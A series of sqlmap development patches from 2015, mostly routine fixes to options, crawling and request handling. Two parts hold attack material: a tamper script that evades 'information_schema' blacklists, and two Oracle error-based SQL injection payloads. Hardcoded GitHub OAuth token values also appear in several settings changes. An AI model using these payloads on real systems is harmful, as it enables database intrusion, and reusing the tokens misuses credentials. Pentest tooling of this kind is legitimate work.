 lib/request/basic.py         | 2 +-
 2 files changed, 10 insertions(+), 1 deletion(-)

diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 1f47d0890..b217438a9 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -30,6 +30,8 @@ from lib.core.common import hashDBWrite
 from lib.core.common import intersect
 from lib.core.common import isListLike
 from lib.core.common import parseTargetUrl
+from lib.core.common import popValue
+from lib.core.common import pushValue
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.common import safeCSValue
@@ -488,6 +490,10 @@ def start():
                         kb.testedParams.add(paramKey)
 
                         if testSqlInj:
+                            if place == PLACE.COOKIE:
+                                pushValue(kb.mergeCookies)
+                                kb.mergeCookies = False
+
                             check = heuristicCheckSqlInjection(place, parameter)
 
                             if check != HEURISTIC_TEST.POSITIVE:
@@ -523,6 +529,9 @@ def start():
                                 warnMsg += "injectable"
                                 logger.warn(warnMsg)
 
+                            if place == PLACE.COOKIE:
+                                kb.mergeCookies = popValue()
+
             if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None):
                 if kb.vainRun and not conf.multipleTargets:
                     errMsg = "no parameter(s) found for testing in the provided data "
diff --git a/lib/request/basic.py b/lib/request/basic.py
index fa6dd8cee..9815b59ed 100755
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -94,7 +94,7 @@ def forgeHeaders(items=None):
                         _ = readInput(message, default="Y")
                         kb.mergeCookies = not _ or _[0] in ("y", "Y")
 
-                    if kb.mergeCookies:
+                    if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
                         _ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
                         headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
 

From e3130c1ba1c8e250726f5918217c2417a58c717a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 26 Mar 2015 11:57:51 +0100
Subject: [PATCH 397/492] Implements #1207

---
 tamper/informationschemacomment.py | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 tamper/informationschemacomment.py

diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py
new file mode 100644
index 000000000..7c146a30e
--- /dev/null
+++ b/tamper/informationschemacomment.py
@@ -0,0 +1,27 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOW
+
+def tamper(payload, **kwargs):
+    """
+    Add a comment to the end of all occurrences of (blacklisted) "information_schema" identifier
+
+    >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
+    'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'
+    """
+
+    retVal = payload
+
+    if payload:
+        retVal = re.sub(r"(?i)(information_schema)\.", "\g<1>/**/.", payload)
+
+    return retVal

From 3be7a447a56f2700590be576b7bab6b192e7165c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 26 Mar 2015 12:22:49 +0100
Subject: [PATCH 398/492] Update

---
 lib/core/settings.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index 22bd1ec27..503479091 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -483,7 +483,7 @@ DEFAULT_COOKIE_DELIMITER = ';'
 FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
 
 # Github OAuth token used for creating an automatic Issue for unhandled exceptions
-GITHUB_REPORT_OAUTH_TOKEN = "29f6bdf5ce4424fc17a19405bce75d6aca7dcd27"
+GITHUB_REPORT_OAUTH_TOKEN = "40c045d05ce0a54fd50ba55059e4554a39beabc4"
 
 # Skip unforced HashDB flush requests below the threshold number of cached items
 HASHDB_FLUSH_THRESHOLD = 32

From 5dfd3ef1e4c3c343e0cf6b4fa716517830194204 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 26 Mar 2015 12:25:32 +0100
Subject: [PATCH 399/492] Another update

---
 lib/core/settings.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index 503479091..66cbc7b14 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -483,7 +483,7 @@ DEFAULT_COOKIE_DELIMITER = ';'
 FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
 
 # Github OAuth token used for creating an automatic Issue for unhandled exceptions
-GITHUB_REPORT_OAUTH_TOKEN = "40c045d05ce0a54fd50ba55059e4554a39beabc4"
+GITHUB_REPORT_OAUTH_TOKEN = "f05e68171afd41a445b1fff80f369fae88b37968"
 
 # Skip unforced HashDB flush requests below the threshold number of cached items
 HASHDB_FLUSH_THRESHOLD = 32

From fc0186e0291090fba6e010b84928985678ba06ee Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 26 Mar 2015 12:39:44 +0100
Subject: [PATCH 400/492] Minor update

---
 lib/request/connect.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 677decdc5..31f81315f 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -538,7 +538,7 @@ class Connect(object):
                 debugMsg = "got HTTP error code: %d (%s)" % (code, status)
                 logger.debug(debugMsg)
 
-        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, struct.error, ProxyError, SqlmapCompressionException), e:
+        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, httplib.ResponseNotReady, struct.error, ProxyError, SqlmapCompressionException), e:
             tbMsg = traceback.format_exc()
 
             if "no host given" in tbMsg:

From 770cfb6102427a7ef909d9db27f7c5cb94b1321c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 26 Mar 2015 15:20:54 +0100
Subject: [PATCH 401/492] Removing test print

---
 lib/core/common.py | 1 -
 1 file changed, 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 62d2bb664..4756f7de7 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1578,7 +1578,6 @@ def safeExpandUser(filepath):
         _ = locale.getdefaultlocale()
         retVal = getUnicode(os.path.expanduser(filepath.encode(_[1] if _ and len(_) > 1 else UNICODE_ENCODING)))
 
-    print retVal
     return retVal
 
 def safeStringFormat(format_, params):

From a19bccc84f73b42fa2de00dd63e5606c2b110d4d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 26 Mar 2015 15:31:29 +0100
Subject: [PATCH 402/492] Fixes #1205

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 4756f7de7..ed4330670 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1306,7 +1306,7 @@ def parseTargetUrl():
         debugMsg = "setting the HTTP Referer header to the target URL"
         logger.debug(debugMsg)
         conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.REFERER, conf.httpHeaders)
-        conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url))
+        conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url.replace(CUSTOM_INJECTION_MARK_CHAR, "")))
 
     if not conf.host and (intersect(HOST_ALIASES, conf.testParameter, True) or conf.level >= 5):
         debugMsg = "setting the HTTP Host header to the target URL"

From 99c1cc9937a7cd607c7fe1741dafccf4b2674252 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 26 Mar 2015 17:17:46 +0100
Subject: [PATCH 403/492] Fixes #1208

---
 lib/request/connect.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 31f81315f..51a187bbc 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -332,7 +332,7 @@ class Connect(object):
             if HTTP_HEADER.ACCEPT not in headers:
                 headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
 
-            if HTTP_HEADER.HOST not in headers:
+            if HTTP_HEADER.HOST not in headers or not target:
                 headers[HTTP_HEADER.HOST] = getHostHeader(url)
 
             if HTTP_HEADER.ACCEPT_ENCODING not in headers:

From c35fa63a480056c51e71dea50d416c37447125b3 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 30 Mar 2015 11:58:09 +0200
Subject: [PATCH 404/492] Fixes #1212

---
 lib/parse/cmdline.py | 2 +-
 sqlmap.conf          | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index fcb38b54d..1cba1d498 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -294,7 +294,7 @@ def cmdLineParser():
                                   "default %d)" % defaults.level)
 
         detection.add_option("--risk", dest="risk", type="int",
-                             help="Risk of tests to perform (0-3, "
+                             help="Risk of tests to perform (1-3, "
                                   "default %d)" % defaults.level)
 
         detection.add_option("--string", dest="string",
diff --git a/sqlmap.conf b/sqlmap.conf
index 55f298b7a..c4d2eb23c 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -282,7 +282,7 @@ level = 1
 # Risk of tests to perform.
 # Note: boolean-based blind SQL injection tests with AND are considered
 # risk 1, with OR are considered risk 3.
-# Valid: Integer between 0 and 3
+# Valid: Integer between 1 and 3
 # Default: 1
 risk = 1
 

From 26bec7219d3e9e3dfa44b78570bf3970245ed191 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 31 Mar 2015 07:33:50 +0200
Subject: [PATCH 405/492] Update for an Issue #1184

---
 xml/payloads/02_error_based.xml | 38 +++++++++++++++++++++++++++++++++
 1 file changed, 38 insertions(+)

diff --git a/xml/payloads/02_error_based.xml b/xml/payloads/02_error_based.xml
index 0cfbeab8c..2b2354d2f 100644
--- a/xml/payloads/02_error_based.xml
+++ b/xml/payloads/02_error_based.xml
@@ -506,6 +506,44 @@
         </details>
     </test>
 
+    <test>
+        <title>Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Firebird AND error-based - WHERE or HAVING clause</title>
         <stype>2</stype>

From 1e7f2d6da2bff3bf204641dcf894450820613284 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 6 Apr 2015 22:07:22 +0200
Subject: [PATCH 406/492] Implements #1215

---
 lib/core/option.py     | 11 +++++++++++
 lib/core/optiondict.py |  1 +
 lib/parse/cmdline.py   |  5 ++++-
 lib/utils/crawler.py   |  4 ++++
 sqlmap.conf            |  3 +++
 5 files changed, 23 insertions(+), 1 deletion(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 0eafd1b20..49d7f2f1e 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -2234,6 +2234,13 @@ def _basicOptionValidation():
             errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, ex)
             raise SqlmapSyntaxException(errMsg)
 
+    if conf.crawlExclude:
+        try:
+            re.compile(conf.crawlExclude)
+        except re.error, ex:
+            errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, ex)
+            raise SqlmapSyntaxException(errMsg)
+
     if conf.dumpTable and conf.dumpAll:
         errMsg = "switch '--dump' is incompatible with switch '--dump-all'"
         raise SqlmapSyntaxException(errMsg)
@@ -2250,6 +2257,10 @@ def _basicOptionValidation():
         errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g', '-m' or '-x'"
         raise SqlmapSyntaxException(errMsg)
 
+    if conf.crawlExclude and not conf.crawlDepth:
+        errMsg = "option '--crawl-exclude' requires usage of switch '--crawl'"
+        raise SqlmapSyntaxException(errMsg)
+
     if conf.csrfUrl and not conf.csrfToken:
         errMsg = "option '--csrf-url' requires usage of option '--csrf-token'"
         raise SqlmapSyntaxException(errMsg)
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index 5844e87e7..355238464 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -188,6 +188,7 @@ optDict = {
                                "batch":             "boolean",
                                "charset":           "string",
                                "crawlDepth":        "integer",
+                               "crawlExclude":      "string",
                                "csvDel":            "string",
                                "dumpFormat":        "string",
                                "eta":               "boolean",
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 1cba1d498..3c1620912 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -606,7 +606,10 @@ def cmdLineParser():
                             help="Force character encoding used for data retrieval")
 
         general.add_option("--crawl", dest="crawlDepth", type="int",
-                                  help="Crawl the website starting from the target URL")
+                            help="Crawl the website starting from the target URL")
+
+        general.add_option("--crawl-exclude", dest="crawlExclude",
+                           help="Regexp to exclude pages from crawling (e.g. \"logout\")")
 
         general.add_option("--csv-del", dest="csvDel",
                                   help="Delimiting character used in CSV output "
diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py
index 733c305e9..e7dfc75e6 100644
--- a/lib/utils/crawler.py
+++ b/lib/utils/crawler.py
@@ -48,6 +48,10 @@ def crawl(target):
                         current = threadData.shared.unprocessed.pop()
                         if current in visited:
                             continue
+                        elif conf.crawlExclude and re.search(conf.crawlExclude, current):
+                            dbgMsg = "skipping '%s'" % current
+                            logger.debug(dbgMsg)
+                            continue
                         else:
                             visited.add(current)
                     else:
diff --git a/sqlmap.conf b/sqlmap.conf
index c4d2eb23c..c3bae6b57 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -647,6 +647,9 @@ charset =
 # Default: 0
 crawlDepth = 0
 
+# Regexp to exclude pages from crawling (e.g. "logout").
+crawlExclude =
+
 # Delimiting character used in CSV output.
 # Default: ,
 csvDel = ,

From 0e4800f73c7a619d479b3dd36ba55ba73303f9d4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 14 Apr 2015 09:30:01 +0200
Subject: [PATCH 407/492] Changing default answer for sitemap checking to N

---
 lib/utils/crawler.py | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py
index e7dfc75e6..42d53436a 100644
--- a/lib/utils/crawler.py
+++ b/lib/utils/crawler.py
@@ -123,9 +123,9 @@ def crawl(target):
 
         if not conf.sitemapUrl:
             message = "do you want to check for the existence of "
-            message += "site's sitemap(.xml) [Y/n] "
-            test = readInput(message, default="Y")
-            if test[0] not in ("n", "N"):
+            message += "site's sitemap(.xml) [y/N] "
+            test = readInput(message, default="n")
+            if test[0] in ("y", "Y"):
                 items = None
                 url = "%s://%s:%d/sitemap.xml" % (conf.scheme, conf.hostname, conf.port)
                 try:

From dbfa8f1cfc689921ab1aa62ecb6a944570a7e1a3 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 14 Apr 2015 11:05:17 +0200
Subject: [PATCH 408/492] Fix for a bug reported by the user
 (conf.scheme/conf.hostname/conf.port were None in multiple targets mode)

---
 lib/utils/crawler.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py
index 42d53436a..ffac14e13 100644
--- a/lib/utils/crawler.py
+++ b/lib/utils/crawler.py
@@ -127,7 +127,7 @@ def crawl(target):
             test = readInput(message, default="n")
             if test[0] in ("y", "Y"):
                 items = None
-                url = "%s://%s:%d/sitemap.xml" % (conf.scheme, conf.hostname, conf.port)
+                url = urlparse.urljoin(target, "/sitemap.xml")
                 try:
                     items = parseSitemap(url)
                 except:

From 7517db76d1dc915b1cb9b51a4a29c3da4c245541 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 16 Apr 2015 18:40:43 +0200
Subject: [PATCH 409/492] Minor fix for SQLite's schema parsing

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index ed4330670..c5c55aa24 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2663,7 +2663,7 @@ def parseSqliteTableSchema(value):
         table = {}
         columns = {}
 
-        for match in re.finditer(r"(\w+)\s+(TEXT|NUMERIC|INTEGER|REAL|NONE)\b", value, re.I):
+        for match in re.finditer(r"(\w+)\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|TEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I):
             columns[match.group(1)] = match.group(2)
 
         table[conf.tbl] = columns

From 349dfbf2ae703e6ce3c86dbc355966becf6373fa Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 20 Apr 2015 23:55:59 +0200
Subject: [PATCH 410/492] Adding an option --safe-post

---
 .gitattributes         | 1 +
 lib/core/optiondict.py | 1 +
 lib/parse/cmdline.py   | 3 +++
 lib/request/connect.py | 3 +--
 sqlmap.conf            | 4 ++++
 5 files changed, 10 insertions(+), 2 deletions(-)

diff --git a/.gitattributes b/.gitattributes
index 8b6e58fe0..a6b6a3526 100644
--- a/.gitattributes
+++ b/.gitattributes
@@ -1,4 +1,5 @@
 *.py text eol=lf
+*.conf text eol=lf
 
 *_ binary
 *.dll binary
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index 355238464..6ce23da37 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -51,6 +51,7 @@ optDict = {
                                "retries":           "integer",
                                "rParam":            "string",
                                "safUrl":            "string",
+                               "safPost":           "string",
                                "saFreq":            "integer",
                                "skipUrlEncode":     "boolean",
                                "csrfToken":         "string",
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 3c1620912..6af59e646 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -188,6 +188,9 @@ def cmdLineParser():
         request.add_option("--safe-url", dest="safUrl",
                            help="URL address to visit frequently during testing")
 
+        request.add_option("--safe-post", dest="safPost",
+                           help="POST data to send to a safe URL")
+
         request.add_option("--safe-freq", dest="saFreq", type="int",
                            help="Test requests between two visits to a given safe URL")
 
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 51a187bbc..e412bd3f1 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -971,11 +971,10 @@ class Connect(object):
                     warnMsg += "10 or more)"
                     logger.critical(warnMsg)
 
-
         if conf.safUrl and conf.saFreq > 0:
             kb.queryCounter += 1
             if kb.queryCounter % conf.saFreq == 0:
-                Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
+                Connect.getPage(url=conf.safUrl, post=conf.safPost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
 
         start = time.time()
 
diff --git a/sqlmap.conf b/sqlmap.conf
index c3bae6b57..b23c58b11 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -152,6 +152,10 @@ rParam =
 # Example: http://192.168.1.121/index.html
 safUrl = 
 
+# POST data to send to a safe URL.
+# Example: username=admin&password=passw0rd!
+safPost = 
+
 # Test requests between two visits to a given safe URL (default 0).
 # Valid: integer
 # Default: 0

From c5138d4696b13c208d0b4c45fe89fc626d4cfe0d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 21 Apr 2015 00:02:47 +0200
Subject: [PATCH 411/492] Minor refactoring

---
 lib/core/option.py     | 12 ++++++------
 lib/core/optiondict.py |  6 +++---
 lib/parse/cmdline.py   |  6 +++---
 lib/request/connect.py |  6 +++---
 sqlmap.conf            |  6 +++---
 5 files changed, 18 insertions(+), 18 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 49d7f2f1e..463557108 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1140,16 +1140,16 @@ def _setSafeUrl():
     """
     Check and set the safe URL options.
     """
-    if not conf.safUrl:
+    if not conf.safeUrl:
         return
 
-    if not re.search("^http[s]*://", conf.safUrl):
-        if ":443/" in conf.safUrl:
-            conf.safUrl = "https://" + conf.safUrl
+    if not re.search("^http[s]*://", conf.safeUrl):
+        if ":443/" in conf.safeUrl:
+            conf.safeUrl = "https://" + conf.safeUrl
         else:
-            conf.safUrl = "http://" + conf.safUrl
+            conf.safeUrl = "http://" + conf.safeUrl
 
-    if conf.saFreq <= 0:
+    if conf.safeFreq <= 0:
         errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe URL feature"
         raise SqlmapSyntaxException(errMsg)
 
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index 6ce23da37..da71e84c1 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -50,9 +50,9 @@ optDict = {
                                "timeout":           "float",
                                "retries":           "integer",
                                "rParam":            "string",
-                               "safUrl":            "string",
-                               "safPost":           "string",
-                               "saFreq":            "integer",
+                               "safeUrl":           "string",
+                               "safePost":          "string",
+                               "safeFreq":          "integer",
                                "skipUrlEncode":     "boolean",
                                "csrfToken":         "string",
                                "csrfUrl":           "string",
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 6af59e646..9a9787adb 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -185,13 +185,13 @@ def cmdLineParser():
         request.add_option("--randomize", dest="rParam",
                            help="Randomly change value for given parameter(s)")
 
-        request.add_option("--safe-url", dest="safUrl",
+        request.add_option("--safe-url", dest="safeUrl",
                            help="URL address to visit frequently during testing")
 
-        request.add_option("--safe-post", dest="safPost",
+        request.add_option("--safe-post", dest="safePost",
                            help="POST data to send to a safe URL")
 
-        request.add_option("--safe-freq", dest="saFreq", type="int",
+        request.add_option("--safe-freq", dest="safeFreq", type="int",
                            help="Test requests between two visits to a given safe URL")
 
         request.add_option("--skip-urlencode", dest="skipUrlEncode",
diff --git a/lib/request/connect.py b/lib/request/connect.py
index e412bd3f1..3321b9d85 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -971,10 +971,10 @@ class Connect(object):
                     warnMsg += "10 or more)"
                     logger.critical(warnMsg)
 
-        if conf.safUrl and conf.saFreq > 0:
+        if conf.safeUrl and conf.safeFreq > 0:
             kb.queryCounter += 1
-            if kb.queryCounter % conf.saFreq == 0:
-                Connect.getPage(url=conf.safUrl, post=conf.safPost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
+            if kb.queryCounter % conf.safeFreq == 0:
+                Connect.getPage(url=conf.safeUrl, post=conf.safePost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
 
         start = time.time()
 
diff --git a/sqlmap.conf b/sqlmap.conf
index b23c58b11..498c3d3e8 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -150,16 +150,16 @@ rParam =
 
 # URL address to visit frequently during testing.
 # Example: http://192.168.1.121/index.html
-safUrl = 
+safeUrl = 
 
 # POST data to send to a safe URL.
 # Example: username=admin&password=passw0rd!
-safPost = 
+safePost = 
 
 # Test requests between two visits to a given safe URL (default 0).
 # Valid: integer
 # Default: 0
-saFreq = 0
+safeFreq = 0
 
 # Skip URL encoding of payload data
 # Valid: True or False

From 95b52a02ecf70bb2e8a7d9b5942cc59a7a0cca5b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 22 Apr 2015 10:28:16 +0200
Subject: [PATCH 412/492] Minor patch for custom injection into HTTP
 Authorization header

---
 lib/core/agent.py | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index 78d81c6e0..20253e124 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -28,6 +28,7 @@ from lib.core.data import queries
 from lib.core.dicts import DUMP_DATA_PREPROCESS
 from lib.core.dicts import FROM_DUMMY_TABLE
 from lib.core.enums import DBMS
+from lib.core.enums import HTTP_HEADER
 from lib.core.enums import PAYLOAD
 from lib.core.enums import PLACE
 from lib.core.enums import POST_HINT
@@ -114,6 +115,11 @@ class Agent(object):
             match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
             if match:
                 origValue = match.group("value")
+            elif ',' in paramString:
+                header = paramString.split(',')[0]
+
+                if header.upper() == HTTP_HEADER.AUTHORIZATION.upper():
+                    origValue = origValue.split(' ')[-1]
 
         if conf.prefix:
             value = origValue

From 77c96de4ea353ab0d5e6237ac2f2b2781cd6622c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 22 Apr 2015 10:33:22 +0200
Subject: [PATCH 413/492] Minor patch related to the last commit

---
 lib/core/agent.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index 20253e124..8f1b6c77b 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -119,7 +119,7 @@ class Agent(object):
                 header = paramString.split(',')[0]
 
                 if header.upper() == HTTP_HEADER.AUTHORIZATION.upper():
-                    origValue = origValue.split(' ')[-1]
+                    origValue = origValue.split(' ')[-1].split(':')[-1]
 
         if conf.prefix:
             value = origValue

From 4ded9a99667ebddaed109258cdb5e1474e961cc0 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 22 Apr 2015 15:32:14 +0200
Subject: [PATCH 414/492] Small patch for existing option validation

---
 lib/core/option.py | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/lib/core/option.py b/lib/core/option.py
index 463557108..c6334b500 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -2261,6 +2261,14 @@ def _basicOptionValidation():
         errMsg = "option '--crawl-exclude' requires usage of switch '--crawl'"
         raise SqlmapSyntaxException(errMsg)
 
+    if conf.safePost and not conf.safeUrl:
+        errMsg = "option '--safe-post' requires usage of option '--safe-url'"
+        raise SqlmapSyntaxException(errMsg)
+
+    if conf.safeFreq and not conf.safeUrl:
+        errMsg = "option '--safe-freq' requires usage of option '--safe-url'"
+        raise SqlmapSyntaxException(errMsg)
+
     if conf.csrfUrl and not conf.csrfToken:
         errMsg = "option '--csrf-url' requires usage of option '--csrf-token'"
         raise SqlmapSyntaxException(errMsg)

From bb98894dc13b1d75197c06b46d722aac3fdf664b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 22 Apr 2015 16:28:54 +0200
Subject: [PATCH 415/492] Adding option --safe-req

---
 lib/core/option.py     | 69 +++++++++++++++++++++++++++++++++++-------
 lib/core/optiondict.py |  1 +
 lib/parse/cmdline.py   |  3 ++
 lib/request/connect.py |  7 +++--
 sqlmap.conf            |  3 ++
 5 files changed, 70 insertions(+), 13 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index c6334b500..a2778d60b 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1136,21 +1136,63 @@ def _setHTTPProxy():
 
     proxyHandler.__init__(proxyHandler.proxies)
 
-def _setSafeUrl():
+def _setSafeVisit():
     """
-    Check and set the safe URL options.
